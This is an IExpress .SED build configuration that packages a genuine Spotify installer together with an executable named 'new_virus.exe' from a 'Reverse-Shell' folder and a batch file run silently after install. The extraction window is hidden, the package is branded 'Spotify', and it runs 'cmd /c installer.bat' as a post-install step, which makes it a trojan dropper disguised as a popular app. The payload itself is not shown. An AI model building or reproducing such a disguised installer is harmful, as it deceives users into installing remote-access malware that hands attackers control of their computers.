[Version]
Class=IEXPRESS
SEDVersion=3
[Options]
PackagePurpose=InstallApp
ShowInstallProgramWindow=0
HideExtractAnimation=1
UseLongFileName=1
InsideCompressed=0
CAB_FixedSize=0
CAB_ResvCodeSigning=0
RebootMode=IS
InstallPrompt=%InstallPrompt%
DisplayLicense=%DisplayLicense%
FinishMessage=%FinishMessage%
TargetName=%TargetName%
FriendlyName=%FriendlyName%
AppLaunched=%AppLaunched%
PostInstallCmd=%PostInstallCmd%
AdminQuietInstCmd=%AdminQuietInstCmd%
UserQuietInstCmd=%UserQuietInstCmd%
SourceFiles=SourceFiles
[Strings]
InstallPrompt=
DisplayLicense=
FinishMessage=
TargetName=C:\Users\User\Desktop\new_virus_installer.EXE
FriendlyName=Spotify
AppLaunched=SpotifySetup.exe
PostInstallCmd=cmd /c installer.bat
AdminQuietInstCmd=
UserQuietInstCmd=
FILE0="SpotifySetup.exe"
FILE1="new_virus.exe"
FILE2="installer.bat"
[SourceFiles]
SourceFiles0=C:\Users\User\Desktop\
SourceFiles1=C:\Users\User\Desktop\Reverse-Shell\dist\
SourceFiles2=C:\Users\User\Desktop\Reverse-Shell\
[SourceFiles0]
%FILE0%=
[SourceFiles1]
%FILE1%=
[SourceFiles2]
%FILE2%=
